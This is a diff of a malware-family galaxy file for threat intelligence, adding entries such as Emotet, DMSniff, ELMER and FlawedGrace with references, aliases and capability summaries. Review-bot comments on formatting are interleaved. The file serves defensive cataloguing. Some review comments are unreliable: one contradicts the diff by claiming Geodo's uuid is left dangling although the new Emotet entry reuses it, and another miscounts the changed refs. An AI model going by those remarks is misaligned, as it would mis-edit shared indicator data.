@@ -5558,15 +6674,21 @@ "value": "Dairy" }, { - "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", + "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on \u201cquality over quantity\u201d in email-based threats. DanaBot\u2019s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. 
", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/", - "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", - "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/" + "https://asert.arbornetworks.com/danabots-travels-a-global-perspective/", + "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/", + "https://www.fortinet.com/blog/threat-research/breakdown-of-a-targeted-danabot-attack.html", + "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", + "https://www.proofpoint.com/us/threat-insight/post/danabot-control-panel-revealed", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", + "https://www.welivesecurity.com/2018/12/06/danabot-evolves-beyond-banking-trojan-new-spam/", + "https://www.welivesecurity.com/2019/02/07/danabot-updated-new-cc-communication/", + "https://blog.yoroi.company/research/dissecting-the-danabot-paylaod-targeting-italy/" ], "synonyms": [], "type": [] 
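Review bot: The rewritten DanaBot description still ends with a trailing space before the closing quote (on this page the string is even split across two lines at that point), while the only substantive change is escaping the curly quotes as `\u201c`/`\u201d`/`\u2019`, which decodes to the identical text; trimming the end to `... remote monitoring capabilities of this banker."` is the one edit worth making here. The proofpoint "new-banking-trojan" and trustwave refs are removed and re-added further down the list, so the hunk reads as six changed refs when only seven were actually added.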
@@ -5579,10 +6701,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", - "https://darkcomet.net", - "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/", + "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", - "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/" + "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", + "https://darkcomet.net", + "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/" ], "synonyms": [ "Fynloski", @@ -5818,7 +6942,7 @@ "value": "DeriaLock" }, { - "description": "", + "description": " A DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi", @@ -5826,7 +6950,9 @@ "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" ], - "synonyms": [], + "synonyms": [ + "PHOTO" + ], "type": [] }, "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", 
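Review bot: The new Derusbi description begins with a leading space, `" A DLL backdoor also reported publicly as ..."`; trim it so the string starts with the capital letter (`"A DLL backdoor also reported publicly as \u201cDerusbi\u201d, capable of ..."`). The FLASHFLOOD entry later in the patch has the same leading-space defect. The DarkComet hunk in this line moves the darkcomet.net and malwarebytes 2012 refs to the end of the list rather than only inserting the two new ones, which again makes the diff larger than the change.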
@@ -5930,6 +7056,19 @@ "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", "value": "DirCrypt" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispenserxfs", + "https://twitter.com/cyb3rops/status/1101138784933085191" + ], + "synonyms": [], + "type": [] + }, + "uuid": "3bbf08fd-f147-4b23-9d48-a53ac836bc05", + "value": "DispenserXFS" + }, { "description": "", "meta": { @@ -5940,7 +7079,9 @@ "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", - "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon" + "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/", + "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", + "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/" ], "synonyms": [], "type": [] 
@@ -5963,6 +7104,19 @@
 "uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed",
 "value": "DMA Locker"
 },
+ {
+ "description": "DMSniff is a point-of-sale malware previously only privately sold. It has been used in breaches of small- and medium-sized businesses in the restaurant and entertainment industries. It uses a domain generation algorithm (DGA) to create lists of command-and-control domains on the fly.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dmsniff",
+ "https://www.flashpoint-intel.com/blog/dmsniff-pos-malware-actively-leveraged-target-medium-sized-businesses/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f",
+ "value": "DMSniff"
+ },
 {
 "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.",
 "meta": {
@@ -5972,7 +7126,9 @@
 "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html",
 "https://blog.talosintelligence.com/2017/03/dnsmessenger.html"
 ],
- "synonyms": [],
+ "synonyms": [
+ "TEXTMATE"
+ ],
 "type": []
 },
 "uuid": "b376580e-aba1-4ac9-9c2d-2df429efecf6",
@@ -5983,9 +7139,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage", - "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html" + "https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/", + "https://www.us-cert.gov/ncas/alerts/AA19-024A", + "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/", + "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html", + "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html", + "https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/", + "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html" + ], + "synonyms": [ + "Agent Drable", + "Webmask" ], - "synonyms": [], "type": [] }, "uuid": "ef46bd90-91d0-4208-b3f7-08b65acb8438", @@ -6123,6 +7288,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/", "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", 
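Review bot: Of the two new DNSpionage synonyms, "Agent Drable" is traceable to the Lastline ref title in the hunk, but "Webmask" is not named by any ref title here; if it comes from the ZDNet piece on the leaked Iranian tooling, a clause in the description tying the two names to that reporting would make the alias verifiable rather than an unexplained string. Note that the entry's `description` is untouched by this hunk, so the Karkoff and Agent Drable developments documented by the seven new refs are not reflected in the summary.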
@@ -6139,6 +7305,24 @@ "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", "value": "Dridex" }, + { + "description": "Driftpin is a small and simple backdoor that enables the attackers to assess the victim. When executed the trojan connects to a C&C server and receives commands to grab screenshots, enumerate running processes and get information about the system and campaign ID.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", + "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", + "https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/" + ], + "synonyms": [ + "Spy.Agent.ORM", + "Toshliph" + ], + "type": [] + }, + "uuid": "76f6f047-1362-4651-bd2f-9ca10c119e8d", + "value": "DRIFTPIN" + }, { "description": "", "meta": { @@ -6253,7 +7437,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", - "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates" + "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", + "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ "Dyreza" 
@@ -6289,6 +7474,20 @@
 "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca",
 "value": "EHDevel"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder",
+ "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf",
+ "https://www.clearskysec.com/iec/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "31b18d64-815c-4464-8fcc-f084953a75f5",
+ "value": "ElectricPowder"
+ },
 {
 "description": "",
 "meta": {
@@ -6318,6 +7517,23 @@
 "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01",
 "value": "Elise"
 },
+ {
+ "description": "ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi, and is capable of performing file uploads and downloads, file execution, and process and directory listings. To retrieve commands, ELMER sends HTTP GET requests to a hard-coded CnC server, and parses the HTTP response packets received from the CnC server for an integer string corresponding to the command that needs to be executed.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer",
+ "https://www.symantec.com/security-center/writeup/2015-122210-5724-99",
+ "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html",
+ "https://attack.mitre.org/software/S0064"
+ ],
+ "synonyms": [
+ "Elmost"
+ ],
+ "type": []
+ },
+ "uuid": "e0a8bb01-f0c8-4e2c-bd1e-4c84135ba834",
+ "value": "ELMER"
+ },
 {
 "description": "",
 "meta": {
@@ -6334,6 +7550,54 @@ "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a", "value": "Emdivi" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet", + "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", + "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", + "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage", + "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/", + "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", + "https://github.com/d00rt/emotet_research", + "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", + "https://www.us-cert.gov/ncas/alerts/TA18-201A", + "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", + "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html", + "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1", + "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", + "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/", + "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", + "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", + "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/", + "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html", + 
"https://persianov.net/emotet-malware-analysis-part-1", + "https://persianov.net/emotet-malware-analysis-part-2", + "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol", + "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/", + "https://paste.cryptolaemus.com", + "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", + "https://www.spamtitan.com/blog/emotet-malware-revives-old-email-conversations-threads-to-increase-infection-rates/", + "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", + "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", + "https://feodotracker.abuse.ch/?filter=version_e", + "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", + "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", + "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69" + ], + "synonyms": [ + "Geodo", + "Heodo" + ], + "type": [] + }, + "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", + "value": "Emotet" + }, { "description": "", "meta": { @@ -6530,6 +7794,20 @@ "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc", "value": "EvilGrab" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilnum", + "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/", + "http://www.pwncode.club/2018/05/javascript-based-bot-using-github-c.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "da922c36-ca13-4ea2-a22d-471e91ddac93", + "value": "EVILNUM (Windows)" + }, { "description": "Privately modded version of the Pony stealer.", "meta": { 
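Review bot: The new Emotet entry reuses uuid `d29eb927-d53d-4af2-b6ce-17b3a1b34fe7` from the Geodo entry removed later in the patch and lists Geodo as a synonym, so relationships keyed on that uuid survive the rename, which is good. Two things still stand out: `"https://paste.cryptolaemus.com"` is a live paste page whose content changes daily, not a citable reference, and the entry carries an empty description despite more than thirty refs. On this page the `+` marker and `"https://persianov.net/emotet-malware-analysis-part-1"` are split across two lines, presumably one diff line in the file. In the EVILNUM hunk the value `"EVILNUM (Windows)"` is the only entry in view with a platform suffix in the display name; if that is meant to disambiguate from a non-Windows variant, a synonym `"EVILNUM"` keeps the plain name searchable.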
@@ -6590,6 +7868,19 @@
 "uuid": "74f8db32-799c-41e5-9815-6272908ede57",
 "value": "MS Exchange Tool"
 },
+ {
+ "description": "ExileRAT is a simple RAT platform capable of getting information on the system (computer name, username, listing drives, network adapter, process name), getting/pushing files and executing/terminating processes.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exilerat",
+ "https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c932a2f3-1470-4b0c-8412-2d081901277b",
+ "value": "Exile RAT"
+ },
 {
 "description": "",
 "meta": {
@@ -6696,6 +7987,19 @@
 "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034",
 "value": "FantomCrypt"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer",
+ "https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f197b0a8-6bea-42ea-b57f-8f6f202f7602",
+ "value": "Farseer"
+ },
 {
 "description": "",
 "meta": {
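Review bot: `"value": "Exile RAT"` differs from the spelling used in the description and in both ref URLs (ExileRAT) while `synonyms` is empty, so the form readers will actually search for is not on the entry; add `"synonyms": ["ExileRAT"]`. The DRIFTPIN entry earlier in the patch has the same mismatch between value (`DRIFTPIN`) and description (`Driftpin`), harmless for case-insensitive matching but worth keeping consistent across the cluster.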
@@ -6886,11 +8190,38 @@ "uuid": "1ab17959-6254-49af-af26-d34e87073e49", "value": "FirstRansom" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flame", + "https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c40dbede-490f-4df4-a242-a2461e3cfc4e", + "value": "Flame" + }, + { + "description": " FLASHFLOOD will scan inserted removable drives for targeted files, and copy those files from the\r\nremovable drive to the FLASHFLOOD-infected system. FLASHFLOOD may also log or copy additional data from the victim computer, such as system information\r\nor contacts.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0ce7e94e-da65-43e4-86f0-9a0bb21d1118", + "value": "FLASHFLOOD" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy", + "https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930", "https://github.com/Coldzer0/Ammyy-v3", "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", 
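Review bot: The FLASHFLOOD description starts with a leading space and keeps two hard line breaks copied from the PDF layout in the middle of sentences (`from the\r\nremovable drive`, `system information\r\nor contacts`), which render as broken sentences in any UI that honours them. Trim the leading space and replace those two `\r\n` sequences with single spaces. Flame's only non-malpedia ref is a PDF on a storage-bucket URL; fine to keep, but such links tend to rot, so if the report has a landing page that is the more durable citation.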
@@ -6902,6 +8233,20 @@ "uuid": "18419355-fd28-41a6-bffe-2df68a7166c4", "value": "FlawedAmmyy" }, + { + "description": "According to ProofPoint, FlawedGrace is written in C++ and can be categorized as a Remote Access Trojan (RAT). It seems to have been developed in the second half of 2017 mainly.\r\n\r\nFlawedGrace uses a series of commands:\r\nFlawedGrace also uses a series of commands, provided below for reference:\r\n* desktop_stat\r\n* destroy_os\r\n* target_download\r\n* target_module_load\r\n* target_module_load_external\r\n* target_module_unload\r\n* target_passwords\r\n* target_rdp\r\n* target_reboot\r\n* target_remove\r\n* target_script\r\n* target_servers\r\n* target_update\r\n* target_upload\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace", + "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ef591233-4246-414b-9fbd-46838f3e5da2", + "value": "FlawedGrace" + }, { "description": "", "meta": { @@ -6935,6 +8280,19 @@ "uuid": "057ff707-a008-4ab8-8370-22b689ed3412", "value": "FlokiBot" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop", + "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0024c2d9-673f-4999-b240-4ae61a72c9b9", + "value": "FlowerShop" + }, { "description": "", "meta": { 
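Review bot: The FlawedGrace description carries two consecutive lead-ins to the same list — `FlawedGrace uses a series of commands:\r\nFlawedGrace also uses a series of commands, provided below for reference:` — and ends with a stray `\r\n` before the closing quote. Keep one lead-in (`FlawedGrace uses a series of commands, provided below for reference:`) and drop the trailing line break. FlowerShop in the next hunk is another entry landing with an empty description.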
@@ -6990,6 +8348,8 @@
 "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/",
 "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/",
 "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html",
+ "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/",
+ "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf",
 "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent",
 "https://blog.talosintelligence.com/2018/06/my-little-formbook.html"
 ],
@@ -7033,6 +8393,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec",
 "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/",
 "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/"
 ],
@@ -7134,14 +8496,18 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab",
+ "https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/",
 "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-being-distributed-via-malspam-disguised-as-receipts/",
 "https://labs.bitdefender.com/2018/02/gandcrab-ransomware-decryption-tool-available-for-free/",
 "https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/",
 "http://asec.ahnlab.com/1145",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/",
 "http://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/",
 "https://www.bleepingcomputer.com/news/security/gandcrab-ransomware-distributed-by-exploit-kits-appends-gdcb-extension/",
 "https://isc.sans.edu/diary/23417",
+ "https://tccontre.blogspot.com/2018/11/re-gandcrab-downloader-theres-more-to.html",
 "https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html",
+ "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/",
 "http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf",
 "https://blog.malwarebytes.com/threat-analysis/2018/01/gandcrab-ransomware-distributed-by-rig-and-grandsoft-exploit-kits/",
 "https://www.europol.europa.eu/newsroom/news/pay-no-more-universal-gandcrab-decryption-tool-released-for-free-no-more-ransom"
@@ -7227,38 +8593,17 @@ "value": "GearInformer" }, { - "description": "", + "description": "According to FireEye, GEMCUTTER is used in a similar capacity as BACKBEND (downloader), but maintains persistence by creating a Windows registry run key.\r\nGEMCUTTER checks for the presence of the mutex MicrosoftGMMZJ to ensure only one copy of GEMCUTTER is executing. If the mutex doesn't exist, the malware creates it and continues execution; otherwise, the malware signals the MicrosoftGMMExit event.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.geodo", - "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", - "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", - "https://www.welivesecurity.com/2018/11/09/emotet-launches-major-new-spam-campaign/", - "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", - "https://blog.kryptoslogic.com/malware/2018/08/01/emotet.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/", - "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", - "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", - "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/", - "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", - "https://www.fidelissecurity.com/threatgeek/2017/07/emotet-takes-wing-spreader", - "https://www.us-cert.gov/ncas/alerts/TA18-201A", - "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", - "https://feodotracker.abuse.ch/?filter=version_e", - "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", - 
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/", - "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html", - "http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1" - ], - "synonyms": [ - "Emotet", - "Heodo" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], + "synonyms": [], "type": [] }, - "uuid": "d29eb927-d53d-4af2-b6ce-17b3a1b34fe7", - "value": "Geodo" + "uuid": "e46ae329-a619-4cfc-8059-af326c11ee79", + "value": "GEMCUTTER" }, { "description": "", @@ -7297,11 +8642,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghole", "https://www.clearskysec.com/gholee-a-protective-edge-themed-spear-phishing-campaign/", - "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", - "https://www.coresecurity.com/core-impact" + "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf" ], "synonyms": [ - "CoreImpact (Modified)" + "CoreImpact (Modified)", + "Gholee" ], "type": [] }, @@ -7314,6 +8659,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet", "https://en.wikipedia.org/wiki/GhostNet", + "https://www.nartv.org/2019/03/28/10-years-since-ghostnet/", "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html" ], "synonyms": [ @@ -7352,7 +8698,8 @@ "http://www.malware-traffic-analysis.net/2018/01/04/index.html", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/decoding-network-data-from-a-gh0st-rat-variant/", "http://www.hexblog.com/?p=1248", - "https://blog.cylance.com/the-ghost-dragon" + "https://blog.cylance.com/the-ghost-dragon", + "https://www.intezer.com/blog-chinaz-relations/" ], "synonyms": [ "Gh0st RAT", 
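Review bot: The Geodo entry (uuid `d29eb927-d53d-4af2-b6ce-17b3a1b34fe7`, synonyms `Emotet`/`Heodo`, about twenty references) is deleted and GEMCUTTER takes its slot under a new uuid `e46ae329-...`, so any MISP event, tag or relationship that already points at the old uuid now dangles after a galaxy sync. If Geodo was merged into another Emotet cluster elsewhere in this file that happens outside this hunk and should be stated in the commit message; otherwise the old entry should be kept (even with a "merged/deprecated" note in its description) rather than dropped. The GEMCUTTER text itself is fine, but the mutex `MicrosoftGMMZJ` and event `MicrosoftGMMExit` are the detection-relevant strings and are copied from the FireEye APT30 report, so quoting them exactly as in that source is worth double-checking.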
@@ -7391,6 +8738,19 @@
 "uuid": "d9e6adf2-4f31-48df-a7ef-cf25d299f68c",
 "value": "GlassRAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos",
+ "https://blog.talosintelligence.com/2019/03/glitchpos-new-pos-malware-for-sale.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d2e0cbfb-c647-48ec-84e2-ca2199cf7d03",
+ "value": "GlitchPOS"
+ },
 {
 "description": "",
 "meta": {
